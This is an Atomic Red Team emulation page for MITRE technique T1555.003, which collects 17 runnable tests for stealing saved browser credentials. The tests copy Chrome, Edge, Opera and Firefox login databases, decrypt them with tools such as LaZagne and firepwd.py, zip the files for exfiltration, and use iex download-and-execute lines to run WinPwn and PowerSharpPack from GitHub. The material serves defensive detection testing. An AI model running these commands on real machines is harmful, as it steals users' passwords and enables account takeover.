T1555.003 - Credentials from Password Stores: Credentials from Web Browsers
Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.
For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\Local\Google\Chrome\User Data\Default\Login Data
and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;
. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData
, which uses the victim’s cached logon credentials as the decryption key.(Citation: Microsoft CryptUnprotectData April 2018)
Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).
Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)
After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).
Atomic Tests
Atomic Test #1 - Run Chrome-password Collector
A modified sysinternals suite will be downloaded and staged. The Chrome-password collector, renamed accesschk.exe, will then be executed from #{file_path}.
Successful execution will produce stdout message stating “Copying db … passwordsDB DB Opened. statement prepare DB connection closed properly”. Upon completion, final output will be a file modification of PathToAtomicsFolder..\ExternalPayloads\sysinternals\passwordsdb.
Adapted from MITRE ATTACK Evals
Supported Platforms: Windows
auto_generated_guid: 8c05b133-d438-47ca-a630-19cc464c4622
| Name | Description | Type | Default Value |
|——|————-|——|—————|
| file_path | File path for modified Sysinternals | string | PathToAtomicsFolder\..\ExternalPayloads|
Attack Commands: Run with
!
1
2
| Set-Location -path "#{file_path}\Sysinternals";
./accesschk.exe -accepteula .;
|
Cleanup Commands:
1
| Remove-Item "#{file_path}\Sysinternals" -Force -Recurse -ErrorAction Ignore
|
Dependencies: Run with
!
Description: Modified Sysinternals must be located at #{file_path}
Check Prereq Commands:
1
| if (Test-Path "#{file_path}\SysInternals") {exit 0} else {exit 1}
|
Get Prereq Commands:
1
2
3
4
5
| New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip"
Expand-Archive "#{file_path}\Modified-SysInternalsSuite.zip" "#{file_path}\sysinternals" -Force
Remove-Item "#{file_path}\Modified-SysInternalsSuite.zip" -Force
|
Atomic Test #2 - Search macOS Safari Cookies
This test uses
to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware.
Upon successful execution, MacOS shell will cd to
and grep for
.
Supported Platforms: macOS
auto_generated_guid: c1402f7b-67ca-43a8-b5f3-3143abedc01b
| Name | Description | Type | Default Value |
|——|————-|——|—————|
| search_string | String to search Safari cookies to find. | string | coinbase|
Attack Commands: Run with
!
1
2
| cd ~/Library/Cookies
grep -q "#{search_string}" "Cookies.binarycookies"
|
Atomic Test #3 - LaZagne - Credentials from Browser
The following Atomic test utilizes LaZagne to extract passwords from browsers on the Windows operating system.
LaZagne is an open source application used to retrieve passwords stored on a local computer.
Supported Platforms: Windows
auto_generated_guid: 9a2915b3-3954-4cce-8c76-00fbf4dbd014
| Name | Description | Type | Default Value |
|——|————-|——|—————|
| lazagne_path | Path to LaZagne | path | PathToAtomicsFolder\T1555.003\bin\LaZagne.exe|
Attack Commands: Run with
! Elevation Required (e.g. root or admin)
"#{lazagne_path}" browsers
Dependencies: Run with
!
Description: LaZagne.exe must exist on disk at specified location (#{lazagne_path})
Check Prereq Commands:
1
| if (Test-Path "#{lazagne_path}") {exit 0} else {exit 1}
|
Get Prereq Commands:
1
2
| New-Item -Type Directory (split-path "#{lazagne_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe" -OutFile "#{lazagne_path}"
|
Atomic Test #4 - Simulating access to Chrome Login Data
Simulates an adversary accessing encrypted credentials from Google Chrome Login database.
Supported Platforms: Windows
auto_generated_guid: 3d111226-d09a-4911-8715-fe11664f960d
Attack Commands: Run with
!
1
2
| Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" -Destination "PathToAtomicsFolder\..\ExternalPayloads"
Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data For Account" -Destination "PathToAtomicsFolder\..\ExternalPayloads"
|
Cleanup Commands:
1
2
| Remove-Item -Path "PathToAtomicsFolder\..\ExternalPayloads\Login Data" -Force -ErrorAction Ignore
Remove-Item -Path "PathToAtomicsFolder\..\ExternalPayloads\Login Data For Account" -Force -ErrorAction Ignore
|
Dependencies: Run with
!
Description: Chrome must be installed
Check Prereq Commands:
1
| if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}
|
Get Prereq Commands:
1
2
3
4
5
6
| New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
$installer = "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi"
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi
msiexec /i $installer /qn
Start-Process -FilePath "chrome.exe"
Stop-Process -Name "chrome"
|
Atomic Test #5 - Simulating access to Opera Login Data
Simulates an adversary accessing encrypted credentials from Opera web browser’s login database.
Supported Platforms: Windows
auto_generated_guid: 28498c17-57e4-495a-b0be-cc1e36de408b
Attack Commands: Run with
!
1
| Copy-Item "$env:APPDATA\Opera Software\Opera Stable\Login Data" -Destination "PathToAtomicsFolder\..\ExternalPayloads"
|
Cleanup Commands:
1
| Remove-Item -Path "PathToAtomicsFolder\..\ExternalPayloads\Login Data" -Force -ErrorAction Ignore
|
Dependencies: Run with
!
Description: Opera must be installed
Check Prereq Commands:
1
| if (((Test-Path "$env:LOCALAPPDATA\Programs\Opera\launcher.exe") -Or (Test-Path "C:\Program Files\Opera\launcher.exe") -Or (Test-Path "C:\Program Files (x86)\Opera\launcher.exe"))) {exit 0} else {exit 1}
|
Get Prereq Commands:
1
2
3
4
5
6
| New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
$installer = "PathToAtomicsFolder\..\ExternalPayloads\OperaStandaloneInstaller.exe"
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\OperaStandaloneInstaller.exe" https://get.geo.opera.com/pub/opera/desktop/82.0.4227.43/win/Opera_82.0.4227.43_Setup.exe
Start-Process $installer -ArgumentList '/install /silent /launchopera=1 /setdefaultbrowser=0'
Start-Sleep -s 180
Stop-Process -Name "opera"
|
Description: Opera login data file must exist
Check Prereq Commands:
1
| if (Test-Path "$env:APPDATA\Opera Software\Opera Stable\Login Data") {exit 0} else {exit 1}
|
Get Prereq Commands:
1
| New-Item -Path "$env:APPDATA\Opera Software\Opera Stable\Login Data" -ItemType File
|
Atomic Test #6 - Simulating access to Windows Firefox Login Data
Simulates an adversary accessing encrypted credentials from firefox web browser’s login database.
more info in https://support.mozilla.org/en-US/kb/profiles-where-firefox-stores-user-data
Supported Platforms: Windows
auto_generated_guid: eb8da98a-2e16-4551-b3dd-83de49baa14c
Attack Commands: Run with
!
1
| Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination "PathToAtomicsFolder\..\ExternalPayloads" -Force -Recurse
|
Cleanup Commands:
1
| Remove-Item -Path "PathToAtomicsFolder\..\ExternalPayloads\Profiles" -Force -ErrorAction Ignore -Recurse
|
Dependencies: Run with
!
Description: Firefox must be installed
Check Prereq Commands:
1
| if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit 0} else {exit 1}
|
Get Prereq Commands:
1
2
3
4
5
| New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$url="https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-US"}else {$url="https://download.mozilla.org/?product=firefox-latest-ssl&os=win&lang=en-US"}
$installer = "PathToAtomicsFolder\..\ExternalPayloads\firefoxsetup.exe"
(New-Object Net.WebClient).DownloadFile($url,$installer)
Start-Process $installer -ArgumentList '/S' -Wait
|
Description: Firefox login data file must exist
Check Prereq Commands:
1
| if (Test-Path "$env:APPDATA\Mozilla\Firefox\Profiles\") {exit 0} else {exit 1}
|
Get Prereq Commands:
1
2
3
4
5
| if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$firefox="C:\Program Files\Mozilla Firefox\firefox.exe"}else {$firefox="C:\Program Files (x86)\Mozilla Firefox\firefox.exe"}
Start-Process $firefox -ArgumentList '-CreateProfile Atomic' -Wait
Start-Process $firefox -NoNewWindow
Start-Sleep -s 20
Stop-Process -Name firefox
|
Atomic Test #7 - Simulating access to Windows Edge Login Data
Simulates an adversary accessing encrypted credentials from Edge web browser’s login database.
more info in https://www.forensicfocus.com/articles/chromium-based-microsoft-edge-from-a-forensic-point-of-view/
Supported Platforms: Windows
auto_generated_guid: a6a5ec26-a2d1-4109-9d35-58b867689329
Attack Commands: Run with
!
1
| Copy-Item "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default" -Destination "PathToAtomicsFolder\..\ExternalPayloads\Edge" -Force -Recurse
|
Cleanup Commands:
1
| Remove-Item -Path "PathToAtomicsFolder\..\ExternalPayloads\Edge" -Force -ErrorAction Ignore -Recurse
|
Dependencies: Run with
!
Description: Edge must be installed
Check Prereq Commands:
1
| if (Test-Path "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe") {exit 0} else {exit 1}
|
Get Prereq Commands:
1
| "Installation is not implemented as Edge is a part of windows"
|
Description: Edge login data file must exist
Check Prereq Commands:
1
| if (Test-Path "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default") {exit 0} else {exit 1}
|
Get Prereq Commands:
1
2
3
4
| $edge="C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Start-Process $edge
Start-Sleep -s 20
Stop-Process -Name msedge
|
Atomic Test #8 - Decrypt Mozilla Passwords with Firepwd.py
Firepwd.py is a script that can decrypt Mozilla (Thunderbird, Firefox) passwords.
Upon successful execution, the decrypted credentials will be output to a text file, as well as displayed on screen.
Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
Supported Platforms: Windows
auto_generated_guid: dc9cd677-c70f-4df5-bd1c-f114af3c2381
| Name | Description | Type | Default Value |
|——|————-|——|—————|
| Firepwd_Path | Filepath for Firepwd.py | string | PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004\Scripts\Firepwd.py|
| Out_Filepath | Filepath to output results to | string | $env:temp\T1555.003Test8.txt|
| VS_CMD_Path | Filepath to Visual Studio Build Tools Command prompt | string | C:\Program Files (x86)\Microsoft Visual Studio\2022\BuildTools\VC\Auxiliary\Build\vcvars64.bat|
| Python_Path | Filepath to python | string | C:\Program Files\Python310\python.exe|
| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004|
Attack Commands: Run with
!
1
2
3
| $PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\"
cmd /c #{venv_path}\Scripts\python.exe #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}
cat #{Out_Filepath}
|
Cleanup Commands:
1
| Remove-Item -Path "#{Out_Filepath}" -erroraction silentlycontinue
|
Dependencies: Run with
!
Description: Firefox profile directory must be present
Check Prereq Commands:
1
| if (get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\" -erroraction silentlycontinue) {exit 0} else {exit 1}
|
Get Prereq Commands:
1
2
3
4
5
6
7
| New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://ftp.mozilla.org/pub/firefox/releases/98.0/win64/en-US/Firefox%20Setup%2098.0.msi" -outfile "PathToAtomicsFolder\..\ExternalPayloads\firefox.msi"
msiexec.exe /i "PathToAtomicsFolder\..\ExternalPayloads\firefox.msi" /quiet
sleep -s 30
start-process "$env:programfiles\Mozilla Firefox\firefox.exe".
sleep -s 5
stop-process -name "firefox"
|
Check Prereq Commands:
1
| if (Test-Path "#{VS_CMD_Path}") {exit 0} else {exit 1}
|
Get Prereq Commands:
1
2
3
| New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://aka.ms/vs/17/release/vs_BuildTools.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\VS_BuildTools.exe"
write-host "Visual Studio Build Tools (Desktop Development with C++) must be installed manually. Please run the installer from PathToAtomicsFolder\..\ExternalPayloads\VS_BuildTools.exe."
|
Description: Python must be installed
Check Prereq Commands:
1
| if (Test-Path "#{Python_Path}") {exit 0} else {exit 1}
|
Get Prereq Commands:
1
2
3
| New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
|
Check Prereq Commands:
1
| if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
|
Get Prereq Commands:
1
| py -m venv "#{venv_path}"
|
Description: Firepwd must exist at #{Firepwd_Path}
Check Prereq Commands:
1
| if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
|
Get Prereq Commands:
1
2
| New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
|
Description: Pycryptodome library must be installed
Check Prereq Commands:
1
| if (#{venv_path}\Scripts\pip.exe show pycryptodome) {exit 0} else {exit 1}
|
Get Prereq Commands:
1
| if (test-path "#{VS_CMD_Path}"){#{venv_path}\Scripts\pip.exe install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"}
|
Description: Pyasn1 library must be installed
Check Prereq Commands:
1
| if (#{venv_path}\Scripts\pip.exe show pyasn1) {exit 0} else {exit 1}
|
Get Prereq Commands:
1
| if (test-path "#{VS_CMD_Path}") & {#{venv_path}\Scripts\pip.exe install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."}
|
Atomic Test #9 - LaZagne.py - Dump Credentials from Firefox Browser
Credential Dump Ubuntu 20.04.4 LTS Focal Fossa Firefox Browser, Reference https://github.com/AlessandroZ/LaZagne
Supported Platforms: Linux
auto_generated_guid: 87e88698-621b-4c45-8a89-4eaebdeaabb1
| Name | Description | Type | Default Value |
|——|————-|——|—————|
| lazagne_path | Path you put LaZagne Github with LaZagne.py | string | /tmp/LaZagne/Linux|
| specific_module | You may change the module to “all” for all password that can be found by LaZagne.py | string | browsers -firefox|
| output_file | This is where output for the Firefox passwords goes | string | /tmp/firefox_password.txt|
Attack Commands: Run with
! Elevation Required (e.g. root or admin)
1
| python3 #{lazagne_path}/laZagne.py #{specific_module} >> #{output_file}
|
Cleanup Commands:
1
| rm -R /tmp/LaZagne; rm -f #{output_file}
|
Dependencies: Run with
!
Description: Get Lazagne from Github and install requirements
Check Prereq Commands:
1
| test -f #{lazagne_path}/laZagne.py
|
Get Prereq Commands:
1
| cd /tmp; git clone https://github.com/AlessandroZ/LaZagne; cd /tmp/LaZagne/; pip install -r requirements.txt
|
Description: Needs git, python3 and some pip stuff
Check Prereq Commands:
1
| which git && which python3 && which pip
|
Get Prereq Commands:
1
| apt install git; apt install python3-pip -y; pip install pyasn1 psutil Crypto
|
Atomic Test #10 - Stage Popular Credential Files for Exfiltration
This test is designed to search a drive for credential files used by the most common web browsers on Windows (Firefox, Chrome, Opera, and Edge), export the found files to a folder, and zip it,
simulating how an adversary might stage sensitive credential files for exfiltration in order to conduct offline password extraction with tools like firepwd.py or HackBrowserData.
Supported Platforms: Windows
auto_generated_guid: f543635c-1705-42c3-b180-efd6dc6e7ee7
Attack Commands: Run with
!
1
2
3
4
5
6
7
8
9
10
| $exfil_folder = "$env:temp\T1555.003"
if (test-path "$exfil_folder") {} else {new-item -path "$env:temp" -Name "T1555.003" -ItemType "directory" -force}
$FirefoxCredsLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\"
if (test-path "$FirefoxCredsLocation\key4.db") {copy-item "$FirefoxCredsLocation\key4.db" -destination "$exfil_folder\T1555.003Firefox_key4.db"} else {}
if (test-path "$FirefoxCredsLocation\logins.json") {copy-item "$FirefoxCredsLocation\logins.json" -destination "$exfil_folder\T1555.003Firefox_logins.json"} else {}
if (test-path "$env:localappdata\Google\Chrome\User Data\Default\Login Data") {copy-item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" -destination "$exfil_folder\T1555.003Chrome_Login Data"} else {}
if (test-path "$env:localappdata\Google\Chrome\User Data\Default\Login Data For Account") {copy-item "$env:localappdata\Google\Chrome\User Data\Default\Login Data For Account" -destination "$exfil_folder\T1555.003Chrome_Login Data For Account"} else {}
if (test-path "$env:appdata\Opera Software\Opera Stable\Login Data") {copy-item "$env:appdata\Opera Software\Opera Stable\Login Data" -destination "$exfil_folder\T1555.003Opera_Login Data"} else {}
if (test-path "$env:localappdata/Microsoft/Edge/User Data/Default/Login Data") {copy-item "$env:localappdata/Microsoft/Edge/User Data/Default/Login Data" -destination "$exfil_folder\T1555.003Edge_Login Data"} else {}
compress-archive -path "$exfil_folder" -destinationpath "$exfil_folder.zip" -force
|
Cleanup Commands:
1
2
| Remove-Item -Path "$env:temp\T1555.003.zip" -force -erroraction silentlycontinue
Remove-Item -Path "$env:temp\T1555.003\" -force -recurse -erroraction silentlycontinue
|
Atomic Test #11 - WinPwn - BrowserPwn
Collect Browser credentials as well as the history via winpwn browserpwn function of WinPwn.
Supported Platforms: Windows
auto_generated_guid: 764ea176-fb71-494c-90ea-72e9d85dce76
Attack Commands: Run with
!
1
2
3
| $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
browserpwn -consoleoutput -noninteractive
|
Cleanup Commands:
1
| rm .\System.Data.SQLite.dll -ErrorAction Ignore
|
Atomic Test #12 - WinPwn - Loot local Credentials - mimi-kittenz
Loot local Credentials - mimi-kittenz technique via function of WinPwn - Extend timeout to 600s
Supported Platforms: Windows
auto_generated_guid: ec1d0b37-f659-4186-869f-31a554891611
Attack Commands: Run with
!
1
2
3
| $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
kittenz -consoleoutput -noninteractive
|
Atomic Test #13 - WinPwn - PowerSharpPack - Sharpweb for Browser Credentials
PowerSharpPack - Sharpweb searching for Browser Credentials technique via function of WinPwn
Supported Platforms: Windows
auto_generated_guid: e5e3d639-6ea8-4408-9ecd-d5a286268ca0
Attack Commands: Run with
!
1
2
| iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Sharpweb.ps1')
Invoke-Sharpweb -command "all"
|
Atomic Test #14 - Simulating Access to Chrome Login Data - MacOS
This test locates the Login Data files used by Chrome to store encrypted credentials, then copies them to the temp directory for later exfil.
Once the files are exfiltrated, malware like CookieMiner could be used to perform credential extraction.
See https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/ .
Supported Platforms: macOS
auto_generated_guid: 124e13e5-d8a1-4378-a6ee-a53cd0c7e369
Attack Commands: Run with
!
1
2
| cp ~/Library/"Application Support/Google/Chrome/Default/Login Data" "/tmp/T1555.003_Login Data"
cp ~/Library/"Application Support/Google/Chrome/Default/Login Data For Account" "/tmp/T1555.003_Login Data For Account"
|
Cleanup Commands:
1
2
| rm "/tmp/T1555.003_Login Data" >/dev/null 2>&1
rm "/tmp/T1555.003_Login Data For Account" >/dev/null 2>&1
|
Atomic Test #15 - WebBrowserPassView - Credentials from Browser
The following Atomic test utilizes WebBrowserPassView to extract passwords from browsers on a Window system. WebBrowserPassView is an open source application used to retrieve passwords stored on a local computer. Recently noticed as a tool used in the BlackCat Ransomware.
Supported Platforms: Windows
auto_generated_guid: e359627f-2d90-4320-ba5e-b0f878155bbe
| Name | Description | Type | Default Value |
|——|————-|——|—————|
| webbrowserpassview_path | Path to the WebBrowserPassView executable | string | PathToAtomicsFolder\T1555.003\bin\WebBrowserPassView.exe|
Attack Commands: Run with
! Elevation Required (e.g. root or admin)
1
2
3
| Start-Process "#{webbrowserpassview_path}"
Start-Sleep -Second 4
Stop-Process -Name "WebBrowserPassView"
|
Dependencies: Run with
!
Description: Check if WebBrowserPassView.exe exists in the specified path #{webbrowserpassview_path}
Check Prereq Commands:
1
| if (Test-Path "#{webbrowserpassview_path}") {exit 0} else {exit 1}
|
Get Prereq Commands:
1
2
| New-Item -Type Directory "PathToAtomicsFolder\T1555.003\bin\" -ErrorAction ignore -Force | Out-Null
Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1555.003/bin/WebBrowserPassView.exe -OutFile "#{webbrowserpassview_path}"
|
Atomic Test #16 - BrowserStealer (Chrome / Firefox / Microsoft Edge)
Github Repo Simple password/cookies stealer for chrome, edge, and gecko based browsers (30 listed working). This attack simulates stealing the data from the browser files and printing them to the command line.
If using to test with Firefox, if the browser is x64 you need to use the x64 build
Supported Platforms: Windows
auto_generated_guid: 6f2c5c87-a4d5-4898-9bd1-47a55ecaf1dd
Attack Commands: Run with
!
1
2
3
4
5
6
7
8
9
| $profile = (Gci -filter "*default-release*" -path $env:Appdata\Mozilla\Firefox\Profiles\).FullName
Copy-Item $profile\key4.db -Destination "PathToAtomicsFolder\..\ExternalPayloads" > $null
Copy-Item $profile\logins.json -Destination "PathToAtomicsFolder\..\ExternalPayloads" > $null
Remove-Item $profile\key4.db > $null
Remove-Item $profile\logins.json > $null
Copy-Item "$env:PathToAtomicsFolder\T1555.003\src\key4.db" -Destination $profile\ > $null
Copy-Item "$env:PathToAtomicsFolder\T1555.003\src\logins.json" -Destination $profile\ > $null
cd "$env:PathToAtomicsFolder\T1555.003\bin"
""|.\BrowserCollector.exe
|
Cleanup Commands:
1
2
3
4
5
6
| $profile = (Gci -filter "*default-release*" -path $env:Appdata\Mozilla\Firefox\Profiles\).FullName
Remove-Item $profile\key4.db > $null
Remove-Item $profile\logins.json > $null
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads" -Destination $profile\ > $null
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\key4.db" > $null
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\logins.json" > $null
|
Dependencies: Run with
!
Description: Firefox must be on the device.
Check Prereq Commands:
1
| if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit 0} else {exit 1}
|
Get Prereq Commands:
1
2
3
4
5
| New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
$installer = "PathToAtomicsFolder\..\ExternalPayloads\FirefoxStubInstaller.exe"
Invoke-WebRequest -OutFile $installer "https://download.mozilla.org/?product=firefox-stub&os=win&lang=en-US"
Start-Process -FilePath $installer -Wait
Stop-Process -Name "firefox"
|
Description: BrowserCollector must exist in the bin directory
Check Prereq Commands:
1
| if (Test-Path "PathToAtomicsFolder\T1555.003\bin\BrowserCollector.exe") {exit 0} else {exit 1}
|
Get Prereq Commands:
1
2
| New-Item -Type Directory "PathToAtomicsFolder\T1555.003\bin\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/SaulBerrenson/BrowserStealer/releases/download/1.0.0.4/BrowserCollector_x64.exe" -Outfile: "PathToAtomicsFolder\T1555.003\bin\BrowserCollector.exe"
|
Check Prereq Commands:
1
| if (Test-Path "PathToAtomicsFolder\T1555.003\src\key4.db") {exit 0} else {exit 1}
|
Get Prereq Commands:
1
2
| Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/key4.db?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\key4.db"
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/logins.json?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\logins.json"
|
Atomic Test #17 - Dump Chrome Login Data with esentutl
This test simulates an adversary using esentutl to dump encrypted credentials from Google Chrome’s Login database.
Reference
Supported Platforms: Windows
auto_generated_guid: 70422253-8198-4019-b617-6be401b49fce
| Name | Description | Type | Default Value |
|——|————-|——|—————|
| output_path | File path for login data dump | string | %temp%\T1555.003_Login_Data.tmp|
Attack Commands: Run with
!
esentutl.exe /y "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data" /d "#{output_path}"
Cleanup Commands:
del /f /q #{output_path} > nul 2>&1
Dependencies: Run with
!
Description: Chrome must be installed
Check Prereq Commands:
1
| if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}
|
Get Prereq Commands:
1
2
3
4
5
6
| New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
$installer = "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi"
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi
msiexec /i $installer /qn
Start-Process -FilePath "chrome.exe"
Stop-Process -Name "chrome"
|